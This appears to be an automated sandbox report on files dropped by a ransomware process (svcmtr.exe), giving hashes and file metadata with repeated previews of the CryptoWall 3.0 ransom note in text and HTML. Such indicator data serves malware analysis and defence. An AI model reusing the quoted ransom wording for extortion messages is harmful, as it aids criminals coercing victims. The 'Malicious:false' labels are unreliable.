                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.381670871302546
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2tPxXSirN6zQgqAYXoMT1ZFZLRctdPF:c+9U40oDgStSQwYXoMT1nkd
                                                                                                                          MD5:39F5E5BA97430224921BF865DCAE3DED
                                                                                                                          SHA1:830DB583B45B0FB8D5BAAAF7C7547EA21EEB6366
                                                                                                                          SHA-256:BFC74C08BF5F50948A157AF89AD3F962D2031555E0CAFC9F55C69C1A0E44BDB6
                                                                                                                          SHA-512:0B4D442711BA9464E62AA7B2E37D04232F60CCB9181267F1FF95547BC55EA1CDEC01D04C3CE13B1D1204145A94A0D6B645D777B54F3104731BEB0FAD9FC09B2B
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.338732154224879
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2fLvmNWDGxArI:c+z5U4a8OoDUX+S2SNWDGxAU
                                                                                                                          MD5:4A1A5591251F295EF69EE166E1E25029
                                                                                                                          SHA1:C890ACF5E4C86AC94C7A5CE857B4E9D9A66E9C94
                                                                                                                          SHA-256:A833299AD64403E10C37B5D48635752D956A50FD37B7E21EEFAE15BAD7579F6F
                                                                                                                          SHA-512:1467E6D4F06BA1823ECE13DF5668DF56C415EC41358D3CE708DE726B6C27AFAD4A954381B26E68F2A2D3F36ABD7D6034A706148F430AA018D5DD96827C8057F9
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):974
                                                                                                                          Entropy (8bit):7.359582985844575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2zAx7nv/X3rhK2Lbj893HM1a/B:c+9U40oDg/h54930a/B
                                                                                                                          MD5:3AEFA66DEC637FF66E0B51D9217230DE
                                                                                                                          SHA1:D2A4100685FF1E53C89E043EFF073BDE2F7157DB
                                                                                                                          SHA-256:FC6E6900B4AD8B7A07813E4CB6B76CC6B23C0AB497BBCFEE79DA234F8B8D36A4
                                                                                                                          SHA-512:D589CB93A000D3C4A89119AA05740127CE8D61C74EF6FF58710E849FB1BF602556488B0A250DEE71B1A4C16FF3B300A507D8AC2EFA73312419DE1E2DB2CA4C78
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.361406768372272
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2xKqMmxFylR7:c+z5U4a8OoDUX+S2ZXFy
                                                                                                                          MD5:DED38ED2CFC47889A13C8C9491B16D54
                                                                                                                          SHA1:19E53E29D08EBC583A452210B206349099A131F3
                                                                                                                          SHA-256:288E21E8451934CC4F5ADC10572E67634CDDAE50BFF21DE8F03F338CD8E026DD
                                                                                                                          SHA-512:F3AEB20A51F2D160AFEC6BDC3127C23058E58E2028F37A37C93EFE11F903A7A78FDED6AAF8DC947EEAEA4C352341E9FC63086252F2E9A8854DE58061A878E543
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4334
                                                                                                                          Entropy (8bit):7.932371040727839
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDt6QcuF+ChoiyHf/xLahSQcBNg3fYTt4GdFabPFNEaPxZT:GopyCwHfZW8CKeGd6DbTT
                                                                                                                          MD5:32007FC6DEF4D91E8E4A8880092CB3CD
                                                                                                                          SHA1:29C1F3F6965CE41A9D858C6A231D0BA9DCFA6FE0
                                                                                                                          SHA-256:445D5310758FF9CF500BDCA539F3F4EC379CB38EA4AF135AF4F103834EB4D425
                                                                                                                          SHA-512:5CD44AF5078449B63689F0B2452BCBF037321AD502403D09E5B4B0A8FDF1C3C16CC16E072B827434ABE62204366A47FEAE19E6C4A2DF634AC8D4FE9EC0685205
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4238
                                                                                                                          Entropy (8bit):7.911208594480593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD0e/EVbBp7JXQc6zyi4jQEuSSTAeUqlwfuzAe05:GoAXBp7J8ybjQCSMwWIAf5
                                                                                                                          MD5:968FF9DB2147D42528980E43BCE6ED31
                                                                                                                          SHA1:72D6A7A9589FD89BB2DF3FDF6B5569A856B6A4EB
                                                                                                                          SHA-256:142781179EC36F5F985398FEA8DE4D425DA9E823F72C4C559937DD5A125B098C
                                                                                                                          SHA-512:55A72D01113D63992046510E08E432B45F4F64FBF8807983D7293E84B9B629342271F64BE359B48D4212940CD21618E02B617460B706B73EBA6FD08F6948A48E
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4238
                                                                                                                          Entropy (8bit):7.9223498801309375
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD5yP8FfseiOCujWco0eAXkoa6m4BTZWHzu/HWupoi:GoV/FfJwWTo0eAXkaNBT0z42uSi
                                                                                                                          MD5:59D69FF28622B32C7A842E5AC6F9312A
                                                                                                                          SHA1:95151C22A60BE3A4C6D3C837060D1EEC0B05A376
                                                                                                                          SHA-256:0E996F84008C16EC8FB1EB80EDD27B0EA6076C072F6BBB91957F5B7E6135F762
                                                                                                                          SHA-512:C7591276042E344EB6AB1712A2A680EFB2017DC7D65B3E8B8ECDB1886EA16F239A2EE6763BF66D07526F3A9A96459015DC839B58C77BC409DF863C9395968472
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):990
                                                                                                                          Entropy (8bit):7.371744844825426
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2ZU1yuD186wDPTsR9FuEbSuJc7Agc:c+9U40oDgfRpbSuEc
                                                                                                                          MD5:136B58C027AC4D70326E2BEBC260BFD5
                                                                                                                          SHA1:6E02C5567EFBBE3BCA9347850FA9F7965DB854B2
                                                                                                                          SHA-256:52899A444C10BE917910AB50F158BF77E286C02034E4FC3AD7B291A94A51C1C2
                                                                                                                          SHA-512:65E82D38DF126AE9A9144CDB521415C14CA870620DA8CE24AE7674FF30415317B423C712D7726C850F5AB8E2F0AFB81F4248CDDA401F274D4682020CF031E85B
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.396937783387186
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2/do+2EMbsEdGhb:c+z5U4a8OoDUX+S2VZYbs
                                                                                                                          MD5:63C966270D0FB0A01400A8F2EE3E1D7F
                                                                                                                          SHA1:F7D3B131E375BA9B60687FA85FCD1949FF6687D4
                                                                                                                          SHA-256:12F455C43E417B3250E48E8930D56478BE5B9C73E238BECB82523E607AFF71FD
                                                                                                                          SHA-512:45442A5914B01223159FC330C08D145A32FA08F46396D2A172D24DABF67EC3BEED70A7F00CF5E93E7B4AAB1E337630CB2C25BF2A9FEDA6FB6958A8F8126E4657
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5822
                                                                                                                          Entropy (8bit):7.956827028163817
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD0fN3xUVWGtI/AFvX1kRTKOLL0mcwW3kCvFLnqLYN8GHsnMuU8IwdB:Goo+VWGtZFsTKoO+yFLCtEsMprwb
                                                                                                                          MD5:754DF98ED3768CEF2A59ABA82A34C6AB
                                                                                                                          SHA1:3E0C6369B74EE53137649EC991DFE7E83A27F207
                                                                                                                          SHA-256:772FE191610850FA7D9E47279247C7FD0EA91959CB1DBBFAA153D481BD17982C
                                                                                                                          SHA-512:1C4593B84E7114EFD98B1D46884454A360ED1BD7AF5D5AF158570FC1068F357C93899DC5240EEF5219EB976D3BB2E3E9D7631B2900C8D0FEDEF549F5A9B9377D
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
